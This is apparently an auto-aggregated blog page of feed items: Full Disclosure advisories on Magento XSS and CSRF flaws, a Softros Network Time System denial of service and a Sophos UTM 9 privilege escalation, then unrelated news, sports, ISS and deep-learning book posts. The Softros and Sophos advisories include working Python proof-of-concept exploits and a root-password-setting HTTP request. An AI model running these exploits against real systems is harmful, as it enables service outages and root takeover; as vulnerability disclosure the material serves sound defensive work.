code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://ift.tt/Vn2J4r . E-mail: defensecode[at]defensecode.com Website: http://ift.tt/Vn2J4r Twitter: https://twitter.com/DefenseCode/

Source: Gmail -> IFTTT-> Blogger

[FD] DefenseCode Security Advisory: Magento Stored Cross-Site Scripting – Downloadable Products

DefenseCode Security Advisory Magento Stored Cross-Site Scripting – Downloadable Products Advisory ID: DC-2018-03-003 Advisory Title: Magento Stored Cross-Site Scripting – Downloadable Products Advisory URL: http://ift.tt/2rhPqdW Software: Magento Version: Magento 2.0 prior to 2.0.18, Magento 2.1 prior to 2.1.12, Magento 2.2 prior to 2.2.3 Vendor Status: Vendor contacted, vulnerability fixed Release Date: 06/03/2018 Risk: MEDIUM 1. General Overview =================== During the security audit of Magento Open Source 2 a stored cross-site scripting vulnerability was discovered that could lead to administrator account takeover by a lower privileged administrator, putting the website customers and their payment information at risk. 2. Software Overview ==================== Magento is an ecommerce platform built on open source technology which provides online merchants with a flexible shopping cart system, as well as control over the look, content and functionality of their online store. Magento offers powerful marketing, search engine optimization, and catalog-management tools. It is a leading enterprise-class eCommerce platform, empowering over 200,000 online retailers. Homepage: http://www.magento.com 3. Vulnerability Description ============================ During the security analysis of Magento Open Source 2 it was discovered that a lower privileged admin with access to Products editing can upload a file for a downloadable product using a random extension (ex. .aaa). Extensions like .html or .php are disallowed but if the content of the file is HTML the application will serve the file as such as there is no content disposition header set to force the download. The attacker can then use the link by enticing the higher privileged admin to open it. Unlike a typical XSS which is often limited by length and payload type, this gives an attacker a whole HTML file to work with. 4. Solution =========== Vendor fixed the reported security issues and released a new version. All users are strongly advised to update to the latest available version. 5. Credits ========== Discovered by Bosko Stankovic (bosko@defensecode.com). 6. Disclosure Timeline ====================== 10/11/2017 Vendor contacted through Bugcrowd platform 15/11/2017 Vendor responded 28/02/2018 Vulnerability fixed 06/03/2018 Advisory released 7. About DefenseCode ==================== DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://ift.tt/Vn2J4r . E-mail: defensecode[at]defensecode.com Website: http://ift.tt/Vn2J4r Twitter: https://twitter.com/DefenseCode/

Source: Gmail -> IFTTT-> Blogger

[FD] DefenseCode Security Advisory: Magento Multiple Stored Cross-Site Scripting Vulnerabilities

DefenseCode Security Advisory Magento Multiple Stored Cross-Site Scripting Vulnerabilities Advisory ID: DC-2018-03-002 Advisory Title: Magento Multiple Stored Cross-Site Scripting Vulnerabilities Advisory URL: http://ift.tt/2rhPqdW Software: Magento Version: Magento 2.0 prior to 2.0.18 Vendor Status: Vendor contacted, vulnerability fixed Release Date: 06/03/2018 Risk: MEDIUM 1. General Overview =================== During the security audit of Magento Open Source 2 multiple medium risk stored cross-site scripting vulnerabilities were discovered that could lead to administrator account takeover, putting the website customers and their payment information at risk. 2. Software Overview ==================== Magento is an ecommerce platform built on open source technology which provides online merchants with a flexible shopping cart system, as well as control over the look, content and functionality of their online store. Magento offers powerful marketing, search engine optimization, and catalog-management tools. It is a leading enterprise-class eCommerce platform, empowering over 200,000 online retailers. Homepage: http://www.magento.com 3. Vulnerability Description ============================ During the security analysis of Magento Open Source 2 prior to 2.0.18 it was discovered that the application returns unescaped and unsanitized user/customer controlled input on direct requests to several application URLs. User/customer controlled information such as customer first and last name, street address, city, company, shipping and billing information are unsanitized and unescaped in an output resulted from a direct request to the following url: http://ift.tt/2oQEOyW User/customer first and last name information is unsanitized and unescaped in an output resulted from a direct request to the following urls: http://ift.tt/2I95ovR http://ift.tt/2oS8bRo http://ift.tt/2I7uhIk The application will return a text/html response with a json-formatted content. All aforementioned user-controlled input is prone to stored cross-site scripting. The prerequisite for this attack is that the Add Secret Key to URLs option is disabled. Secret keys are an additional anti-CSRF measure in Magento, with form keys being the primary measure (that can not be disabled). In a team setting this option is often disabled in order to be able to to pass admin links to coleagues, tickets, chat, etc. 4. Solution =========== Vendor fixed the reported security issues and released a new version. All users are strongly advised to update to the latest available version. 5. Credits ========== Discovered by Bosko Stankovic (bosko@defensecode.com). 6. Disclosure Timeline ====================== 19/04/2017 Vendor contacted through Bugcrowd platform 19/04/2017 Vendor responded 28/02/2018 Vulnerability fixed 06/03/2018 Advisory released 7. About DefenseCode ==================== DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://ift.tt/Vn2J4r . E-mail: defensecode[at]defensecode.com Website: http://ift.tt/Vn2J4r Twitter: https://twitter.com/DefenseCode/

Source: Gmail -> IFTTT-> Blogger

[FD] DefenseCode Security Advisory: Magento Backups Cross-Site Request Forgery

DefenseCode Security Advisory Magento Backups Cross-Site Request Forgery Advisory ID: DC-2018-03-001 Advisory Title: Magento Backups Cross-Site Request Forgery Advisory URL: http://ift.tt/2rhPqdW Software: Magento Version: Magento Open Source prior to 1.9.3.8, Magento Commerce prior to 1.14.3.8, Magento 2.0 prior to 2.0.18, Magento 2.1 prior to 2.1.12, Magento 2.2 prior to 2.2.3 Vendor Status: Vendor contacted, vulnerability fixed Release Date: 06/03/2018 Risk: MEDIUM 1. General Overview =================== During the security audit of Magento Open Source 1 and 2 a vulnerability was discovered that could allow an attacker to force an authenticated admin to perform backups and put the store into maintenance mode during backups, which could serve as a denial of service attack vector. 2. Software Overview ==================== Magento is an ecommerce platform built on open source technology which provides online merchants with a flexible shopping cart system, as well as control over the look, content and functionality of their online store. Magento offers powerful marketing, search engine optimization, and catalog-management tools. It is a leading enterprise-class eCommerce platform, empowering over 200,000 online retailers. Homepage: http://www.magento.com 3. Vulnerability Description ============================ During the security analysis of Magento 2 and 1 Cross-Site Request Forgery (CSRF) vulnerability was discovered that could allow an attacker to force an authenticated admin to perform backups and put the store into maintenance mode during backups, which could potentially serve as a denial of service attack vector. When a backup HTTP request is changed from POST to GET, the lack of form_key parameter which serves as a CSRF token is completely ignored and thus allows the request to be abused for CSRF attacks. The following URL is used in the attacks: Magento 2: http://ift.tt/2FZmPhL Magento 1: http://ift.tt/2D3NJCl The prerequisite for this attack is that the Add Secret Key to URLs option is disabled. Secret keys are an additional anti-CSRF measure in Magento, with form keys being the primary measure (that can not be disabled). In a team setting this option is often disabled in order to be able to to pass admin links to coleagues, tickets, chat, etc. 4. Solution =========== Vendor fixed the reported security issues and released a new version. All users are strongly advised to update to the latest available version. 5. Credits ========== Discovered by Bosko Stankovic (bosko@defensecode.com). 6. Disclosure Timeline ====================== 05/11/2017 Vendor contacted through Bugcrowd platform 17/11/2017 Vendor responded 28/02/2018 Vulnerability fixed 06/03/2018 Advisory released 7. About DefenseCode ==================== DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://ift.tt/Vn2J4r . E-mail: defensecode[at]defensecode.com Website: http://ift.tt/Vn2J4r Twitter: https://twitter.com/DefenseCode/

Source: Gmail -> IFTTT-> Blogger

[FD] Softros Network Time System Server v2.3.4 / Denial Of Service CVE-2018-7658

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://ift.tt/2thMJe2 [+] ISR: Apparition Security Vendor: ============= www.softros.com http://ift.tt/2oNvCMG Product: =========== Network Time System Server v2.3.4 Both x86/x64 versions Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment establishing an interconnected time synchronization system for each and every machine and device on the company network. Vulnerability Type: =================== Denial Of Service CVE Reference: ============== CVE-2018-7658 Security Issue: ================ Network Time System (Server) "NTSServerSvc" service listens on Port 7001, unauthenticated remote attackers can crash the Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization could then potentially be impacted. Stack dump: ''' eax=0320119a ebx=0000000b ecx=000000ff edx=00000000 esi=03167040 edi=0050b328 eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0 nv up ei ng nz ac pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297 NTSServerSvc+0x69a5: 004069a5 880a mov byte ptr [edx],cl ds:0023:00000000=?? Resetting default scope FAULTING_IP: NTSServerSvc+69a5 004069a5 880a mov byte ptr [edx],cl EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 004069a5 (NTSServerSvc+0x000069a5) ExceptionCode: c0000005 (Access violation) ''' Exploit/POC: ============= import socket #Network Time System (Server) NTSServerSvc.exe v2.3.4 #Softros Systems #NTS Server service for time synchronization over network print 'Network Time Server 11 byte Denial Of Service' print 'by hyp3rlinx' HOST=raw_input('Network Time Server IP') PORT=7001 payload='A'*11 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((HOST,PORT)) s.send(payload) s.close() Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ============================= Vendor Notification: February 10, 2018 Second attempt : February 24, 2018 Request CVE, assigned by Mitre : March 3, 2018 March 5, 2018: Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

[FD] KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service

KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service Advisory ID: KL-001-2018-007 Publication Date: 2018.03.02 Publication URL: http://ift.tt/2HYyuOt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: UTM 9 Affected Version: 9.410 Platform: Embedded Linux CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation) Impact: Privilege Escalation Attack vector: SSH 2. Vulnerability Description The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, the running service is accessible over a network port on the loopback interface. By replaying the network traffic required to obtain a SID from this service it is possible to escalate privileges to root. 3. Technical Description 1. Obtain the a privileged session token $ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7 loginuser@1.3.3.7's password: $ python kl-loginuser-confd-priv_esc.py pojiZSqWEUAUDNIQtSop 2. Using that session token, set the root password POST /webadmin.plx HTTP/1.1 Host: 1.3.3.7:4444 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.5.1.1 Content-Type: application/json; charset=UTF-8 Referer: https://1.3.3.7:4444/ Content-Length: 422 Cookie: SID=pojiZSqWEUAUDNIQtSop DNT: 1 Connection: close {"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false} HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 15:33:53 GMT Server: Apache Expires: Thursday, 01-Jan-1970 00:00:01 GMT Pragma: no-cache X-Frame-Options: SAMEORIGIN X-Content-Type-Option: nosniff X-XSS-Protection: 1; mode=block Vary: Accept-Encoding Connection: close Content-Type: application/json; charset=utf-8 Content-Length: 178895 {"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000] 3. Look for success message. "objs":[{"success":[{"text":"Shell user password(s) set successfully."}] 4. Profit. loginuser@[redacted]:/home/login > su Password: [redacted]:/home/login # id uid=0(root) gid=0(root) groups=0(root),890(xorp) 4. Mitigation and Remediation Recommendation The vendor has addressed this vulnerability in version 9.508. Release notes and download instructions can be found at: http://ift.tt/2oJHuyk 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.07.21 - KoreLogic submits vulnerability details to Sophos. 2017.07.21 - Sophos acknowledges receipt. 2017.09.01 - 30 business days have elapsed since the vulnerability was reported to Sophos. 2017.09.15 - KoreLogic requests an update on the status of this and other vulnerabilities reported to Sophos. 2017.09.18 - Sophos informs KoreLogic that this issue will require additional engineering and requests an extension of the disclosure timeline. 2017.09.25 - 45 business days have elapsed since the vulnerability was reported to Sophos. 2017.11.07 - 75 business days have elapsed since the vulnerability was reported to Sophos. 2017.12.14 - 100 business days have elapsed since the vulnerability was reported to Sophos. 2018.01.12 - KoreLogic requests an update from Sophos. 2018.01.15 - Sophos informs KoreLogic that the expected release date for the UTM 9.5 MR 6 version containing the mitigation is the middle of February. 2018.01.16 - 120 business days have elapsed since the vulnerability was reported to Sophos. 2018.02.28 - 150 business days have elapsed since the vulnerability was reported to Sophos. 2018.03.01 - UTM 9.508 released by Sophos. 2018.03.02 - KoreLogic public disclosure. 7. Proof of Concept from socket import socket,AF_INET,SOCK_STREAM class Exploit: def __init__(self): self.host = '127.0.0.1' self.port = 4472 self.connected = False self.s = None return None def disconnect(self): self.s.close() return True def send_trigger(self): packet_one = '00000039050702000000050a0a43616c6c4d6574686f6404110b41737461726f3a3a52504303000000000a036765740a04697076360a06737461747573'.decode('hex') self.s.send(packet_one) self.s.recv(4096) packet_two = '00000099050702000000040a094e657748616e646c650a037379730a036e65770403000000060a0f636f6e66642d636c69656e742e706c00000006636c69656e7417000000000870617373776f72640a093132372e302e302e31000000066173675f69700a093132372e302e302e31000000026970170673797374656d00000008757365726e616d65170673797374656d00000008666163696c697479'.decode('hex') self.s.send(packet_two) self.s.recv(4096) packet_three = '0000002f05070200000003170a43616c6c4d6574686f6404110b41737461726f3a3a525043030000000017076765745f534944'.decode('hex') self.s.send(packet_three) print self.s.recv(4096).strip() return True def connect(self): self.s = socket(AF_INET, SOCK_STREAM) self.s.connect((self.host,self.port)) self.connected = True return True def run(self): self.connect() self.send_trigger() self.disconnect() return True if __name__=="__main__": Exploit().run() The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://ift.tt/18BcYvD KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. http://ift.tt/292hO8r Our public vulnerability disclosure policy is available at: http://ift.tt/299jOzg

Source: Gmail -> IFTTT-> Blogger

Mechanical Turk is Not Anonymous

from Google Alert - anonymous http://ift.tt/2xyLwQ5
via IFTTT

Calvin Ridley at No. 16? Ravens' pipe dream is suddenly a possibility - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/05/2018

Combustion Integrated Rack (CIR) Advanced Combustion via Microgravity Experiments (ACME) Electric-Field Effects on Laminar Diffusion (E-Field) Flames: The crew replaced the compensator module in the CIR Hi Bit-depth Multi-Spectral (HiBMS) Imaging package today. This is in preparation for the upcoming ACME E-Field Flames investigation. The ACME investigation is a set of five independent studies of … Continue reading

from ISS On-Orbit Status Report http://ift.tt/2oMy5Xv
via IFTTT

Anonymous Cart Migration to Existing User Cart

Hello,. We are using EPiServer CMS 10.10.4 and Commerce 10.8 and have been running into an issue when a user logs into their account with a cart created when logged out. If the user is new or did not have a previous cart with their logged in cart and log in with an anonymous cart, everything seems ...

from Google Alert - anonymous http://ift.tt/2HdBfdH
via IFTTT

Run 'Kali Linux' Natively On Windows 10 — Just Like That!

Great news for hackers. Now you can download and install Kali Linux directly from the Microsoft App Store on Windows 10 just like any other application. I know it sounds crazy, but it's true! Kali Linux, a very popular, free, and open-source Linux-based operating system widely used for hacking and penetration testing, is now natively available on Windows 10, without requiring dual boot or

from The Hacker News http://ift.tt/2oXqdC2
via IFTTT

Territory Manager

New! Fantastic opportunity to join a growing medical company! We're looking for a highly driven sales professional with strong...See this and similar jobs on LinkedIn.

from Google Alert - anonymous http://ift.tt/2oLacjk
via IFTTT

1.7 Tbps DDoS Attack — Memcached UDP Reflections Set New Record

The bar has been raised. As more amplified attacks were expected following the record-breaking 1.35 Tbps Github DDoS attack, someone has just set a new record after only four days — 1.7 Tbps DDoS attack. Network security and monitoring company Arbor Networks claims that its ATLAS global traffic and DDoS threat data system have recorded a 1.7Tbps reflection/amplification attack against one of

from The Hacker News http://ift.tt/2tjG5UH
via IFTTT

Colorful Airglow Bands Surround Milky Way

Why would the sky glow like a giant repeating rainbow? Airglow. Now air glows all of the time, but it is usually hard to see. A disturbance however -- like an approaching storm -- may cause noticeable rippling in the Earth's atmosphere. These gravity waves are oscillations in air analogous to those created when a rock is thrown in calm water. Red airglow likely originates from OH molecules about 87-kilometers high, excited by ultraviolet light from the Sun, while orange and green airglow is likely caused by sodium and oxygen atoms slightly higher up. While driving near Keluke Lake in Qinghai Provence in China, the photographer originally noticed mainly the impressive central band of the Milky Way Galaxy. Stopping to photograph it, surprisingly, the resulting sensitive camera image showed airglow bands to be quite prominent and span the entire sky. The featured image has been digitally enhanced to make the colors more vibrant. via NASA http://ift.tt/2FhJXqI

Monday, March 5, 2018

Contact HP - Anonymous выбранное

from Google Alert - anonymous http://ift.tt/2lSlxvp
via IFTTT

An improved anonymous authentication scheme for roaming in ubiquitous networks

With the evolution of communication technology and the exponential increase of mobile devices, the ubiquitous networking allows people to use our data and computing resources anytime and everywhere. However, numerous security concerns and complicated requirements arise as these ubiquitous ...

from Google Alert - anonymous http://ift.tt/2oRNc1b
via IFTTT

New 4G LTE Network Attacks Let Hackers Spy, Track, Spoof and Spam

Security researchers have discovered a set of severe vulnerabilities in 4G LTE protocol that could be exploited to spy on user phone calls and text messages, send fake emergency alerts, spoof location of the device and even knock devices entirely offline. A new research paper [PDF] recently published by researchers at Purdue University and the University of Iowa details 10 new cyber attacks

from The Hacker News http://ift.tt/2oRi2Xz
via IFTTT

NFL Insiders predict: Why Jimmy Graham will end up with Ravens - Dan Graziano (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/02/2018

Node 3 Major Constituent Analyzer (MCA) Calibration Failure: Yesterday, the crew successfully replaced the N3 MCA Verification Gas Assembly (VGA) as part of regularly scheduled maintenance. During calibration, however, data was off-nominal and the planned full calibration failed to complete. Teams continue to work a forward plan to restore full N3 MCA functionality. SUPVIS-Justin: The … Continue reading

from ISS On-Orbit Status Report http://ift.tt/2thSdWf
via IFTTT

600 Powerful Bitcoin-Mining Computers Worth $2 Million Stolen In Iceland

Around 600 powerful devices specifically designed for mining bitcoin and other cryptocurrencies have been stolen from Icelandic data centers in what has been dubbed the "Big Bitcoin Heist." To make a profit, so far criminals have hacked cryptocurrency exchanges, spread mining malware, and ransomware—and even kidnapped cryptocurrency investors for ransom and tried to rob a bitcoin exchange,

from The Hacker News http://ift.tt/2H6oOR5
via IFTTT

The 7 best deep learning books you should be reading right now

In today’s post I’m going to share with you the 7 best deep learning books (in no particular order) I have come across and would personally recommend you read.

Some of these deep learning books are heavily theoretical, focusing on the mathematics and associated assumptions behind neural networks and deep learning.

Other deep learning books are entirely practical and teach through code rather than theory.

And even other deep learning books straddle the line, giving you a healthy dose of theory while enabling you to “get your hands dirty” and learn by implementing (these tend to be my favorite deep learning books).

For each deep learning book I’ll discuss the core concepts covered, the target audience, and if the book is appropriate for you.

To discover the 7 best books for studying deep learning, just keep reading!

The 7 best deep learning books you should be reading right now

Before you choose a deep learning book, it’s best to assess your own personal learning style to ensure you get the most out of the book.

Start by asking yourself the following question:

How do I best learn? Do I like to learn from theoretical texts? Or do I like to learn from code snippets and implementation?

Everyone has their own personal learning style and your answers here will dictate which deep learning books you should be reading.

For me personally, I like to strike a balance between the two.

Deep learning books that are entirely theoretical and go too far into the abstract make it far too easy for my eyes to gloss over.

But on the other hand, if a deep learning book skips theory entirely and jumps straight into implementation, I know I’m missing out on core theoretical underpinnings that may help me approach a new deep learning problem or project.

In my opinion, a good deep learning book needs to carefully balance the two.

We need theory to help us understand the core fundamentals of deep learning — and at the same time we need implementation and code snippets to help us reinforce what we just learned.

1. Deep Learning

It’s hard (if not impossible) to write a blog post regarding the best deep learning books without mentioning Goodfellow, Bengio, and Courville’s Deep Learning text.

This book is meant to be a textbook used to teach the fundamentals and theory surrounding deep learning in a college-level classroom.

Goodfellow et al.’s Deep Learning is entirely theoretical and written for an academic audience. There is no code covered in the book.

The book starts with a discussion on machine learning basics, including the applied mathematics needed to effectively study deep learning (linear algebra, probability and information theory, etc.) from an academic perspective.

From there, the book moves into modern deep learning algorithms and techniques.

The final part of Deep Learning focuses more on current research trends and where the deep learning field is moving.

I’ve personally read through this book twice, cover to cover, and have found it incredibly valuable, provided you have the mathematical/academic rigor required for such a textbook.

Deep Learning is available for online viewing for free from the book’s homepage. You can purchase a hardcopy of the text from Amazon.

You should read this deep learning book if…

You learn from theory rather than implementation
You enjoy academic writing
You are a professor, undergraduate, or graduate student doing work in deep learning

2. Neural Networks and Deep Learning

My second theory-based deep learning (e)book recommendation is Neural Networks and Deep Learning by Michael Nielsen.

The book does include some code but it’s important to underline the “some” — there are a total of seven Python scripts accompanying the book, all discussing a various fundamental machine learning, neural network, or deep learning technique on the MNIST dataset. The implementations are not the most “exciting” in the world, but they will help demonstrate some of the theoretical concepts in the text.

If you are new to machine learning and deep learning but are eager to dive into a theory-based learning approach, Nielsen’s book should be your first stop.

The book is a much quicker read than Goodfellow’s Deep Learning and Nielsen’s writing style combined with occasional code snippets makes it easier to work through.

You should read this deep learning book if…

You are looking for a theory-based deep learning text
Are new to machine learning/deep learning and want to approach the field from a more academic standpoint

3. Deep Learning with Python

Francois Chollet, Google AI researcher and creator of the popular Keras deep learning library, published his book, Deep Learning with Python in October 2017.

Francois’ book takes a practitioner’s approach to deep learning. Some theory and discussion is included, but for every few paragraphs of theory, you’ll find a Keras implementation of the technique.

One of my favorite aspects of this book is how Francois includes examples for deep learning applied to computer vision, text, and sequences, making it a well rounded book for readers who want to learn the Keras library while studying machine learning and deep learning fundamentals.

I found Francois’ writing to be clear and accessible. His additional commentary on deep learning trends and history is phenomenal and insightful.

It’s important to note that this book is not meant to be a super deep dive into deep learning. Instead, it’s primary use is to teach you (1) the fundamentals of deep learning (2) through the Keras library (3) using practical examples in a variety of deep learning domains.

You should read this deep learning book if…

You are interested in the Keras library
You “learn by doing/implementing”
You want a quick understanding of how deep learning is applied to various fields, such as computer vision, sequence learning, and text

4. Hands-On Machine Learning with Scikit-Learn and TensorFlow

When I first purchased a copy of Aurélien Géron’s Hands-on Machine Learning with Scikit-Learn and TensorFlow, I wasn’t sure what to expect — had the title not included the word “TensorFlow” I may have breezed right by it, thinking it was only a basic introduction to machine learning.

But at the same time, appending the word “TensorFlow” to an already lengthy title that seems to focus on basic machine learning made me think it was a cheap marketing tactic to sell more copies — everyone is interested in deep learning, right?

Luckily, I was wrong — the book is a good read and the title shouldn’t deter you from reading through it.

Géron’s deep learning book is organized in two parts.

The first part covers basic machine learning algorithms such as Support Vector Machines (SVMs), Decision, Trees, Random Forests, ensemble methods, and basic unsupervised learning algorithms. Scikit-learn examples for each of the algorithms are included.

The second part then covers elementary deep learning concepts through the TensorFlow library.

You should read this deep learning book if…

You are new to machine learning and want to start with core principles with code examples
You are interested in the popular scikit-learn machine learning library
You want to quickly learn how to operate the TensorFlow library for basic deep learning tasks

5. TensorFlow Deep Learning Cookbook

If you like the “cookbook” style of teaching (little-to-no theory and lots of code), I would suggest taking a look at Gulli and Kapoor’s TensorFlow Deep Learning Cookbook.

This deep learning book is entirely hands-on and is a great reference for TensorFlow users.

Again, this book is not meant to necessarily teach deep learning, but instead show you how to operate the TensorFlow library in the context of deep learning.

Don’t get me wrong — you will absolutely learn new deep learning concepts, techniques, and algorithms along the way, but the book takes a heavy-handed cookbook approach: lots of code and explanations of what the code is doing.

My only criticism of the book is that there are some typos in the code snippets. This can be expected when writing a book that is entirely code focused. Typos happen, I can certainly attest to that. Just be aware of this when you are working through the text.

You should read this deep learning book if…

You have already studied the fundamentals of deep learning
You are interested in the TensorFlow library
You enjoy the “cookbook” style of teaching where code is provided to solve a particular problem but the underlying theory is not discussed

6. Deep Learning: A Practitioners Approach

While most deep learning books that include code samples use Python, Adam Gibson and Josh Patterson’s Deep Learning: A Practitioners Approach instead use Java and the DL4J library.

Why Java?

Java is the most used programming language in large corporations, especially at the enterprise level.

The first few chapters in Gibson and Patterson’s book discuss basic machine learning and deep learning fundamentals. The rest of the book includes Java-based deep learning code examples using DL4J.

You should read this deep learning book if…

You have a specific use case where the Java programming language needs to be utilized
You work for a large company or enterprise organization where Java is primarily used
You want to understand how to operate the DL4J library

7. Deep Learning for Computer Vision with Python

I’ll be completely honest and forthcoming and admit that I’m biased — I wrote Deep Learning for Computer Vision with Python.

That said, my book really has become one of the best deep learning and computer vision resources available today (take a look at this review and this one as well if you need an honest second opinion).

Francois Chollet, AI researcher at Google and creator of Keras, had this to say about my new deep learning book:

This book is a great, in-depth dive into practical deep learning for computer vision. I found it to be an approachable and enjoyable read: explanations are clear and highly detailed. You’ll find many practical tips and recommendations that are rarely included in other books or in university courses. I highly recommend it, both to practitioners and beginners. — Francois Chollet

And Adam Geitgey, the author of the popular Machine Learning is Fun! blog series, said this:

I highly recommend grabbing a copy of Deep Learning for Computer Vision with Python. It goes into a lot of detail and has tons of detailed examples. It’s the only book I’ve seen so far that covers both how things work and how to actually use them in the real world to solve difficult problems. Check it out! — Adam Geitgey

If you’re interested in studying deep learning applied to computer vision (image classification, object detection, image understanding, etc.), this is the perfect book for you.

Inside my book you will:

Learn the foundations of machine learning and deep learning in an accessible manner that balances both theory and implementation
Study advanced deep learning techniques, including object detection, multi-GPU training, transfer learning, and Generative Adversarial Networks (GANs)
Replicate the results of state-of-the-art papers, including ResNet, SqueezeNet, VGGNet, and others on the 1.2 million ImageNet dataset

Furthermore, I provide the best possible balance of both theory and hands-on implementation. For each theoretical deep learning concept you’ll find an associated Python implementation to help you cement the knowledge.

Be sure to take a look — and while you’re checking out the book, don’t forget to grab your (free) table of contents + sample chapters PDF of the book.

You should read this deep learning book if…

You are specifically interested in deep learning applied to computer vision and image understanding
You want an excellent balance between theory and implementation
You want a deep learning book that makes seemingly complicated algorithms and techniques easy to grasp and understand
You want a clear, easy to follow book to guide you on your path to deep learning mastery

Summary

In this post you discovered my seven favorite books for studying deep learning.

Have you purchased or read through one of these books? If so, leave a comment and let me know what you think of it.

Did I miss a book that you think should be on this list? If so, be sure to contact me or leave a comment.

The post The 7 best deep learning books you should be reading right now appeared first on PyImageSearch.

from PyImageSearch http://ift.tt/2FfB9la
via IFTTT

anonymous-php/containers

Collection of simple but useful implementations of ContainerInterface from PSR-11.

from Google Alert - anonymous http://ift.tt/2oPe5mc
via IFTTT

FICTION_L Digest - 28 Feb 2018 to 4 Mar 2018 (#2018-39)

There is 1 message totaling 540 lines in this issue. Topics of the day: 1. Stoker Awards (Horror Writers Association) awarded last night ######################################################################## To unsubscribe from the FICTION_L list, click the following link: http://ift.tt/2FVcCCY

Source: Gmail -> IFTTT-> Blogger

Slow Arrow

Buy Slow Arrow by Anonymous (eBook) online at Lulu. Visit the Lulu Marketplace for product details, ratings, and reviews.

from Google Alert - anonymous http://ift.tt/2oGSSvE
via IFTTT

Sunday, March 4, 2018

EventSubscriber not run on Cached pages for Anonymous users

The eventsubscriber doesn't run before the dynamic page cache so page requests from anonymous users are not logged. http://ift.tt/2Fd21m1 Seems to propose a solution to this problem.

from Google Alert - anonymous http://ift.tt/2FSl0Dl
via IFTTT

Anonymous UBC

Anonymous UBC is a very private individual who doesn't want their personal effects scattered across the internets, thank you very much and have a good day.

from Google Alert - anonymous http://ift.tt/2FdcJJd
via IFTTT

Clouds, Birds, Moon, Venus

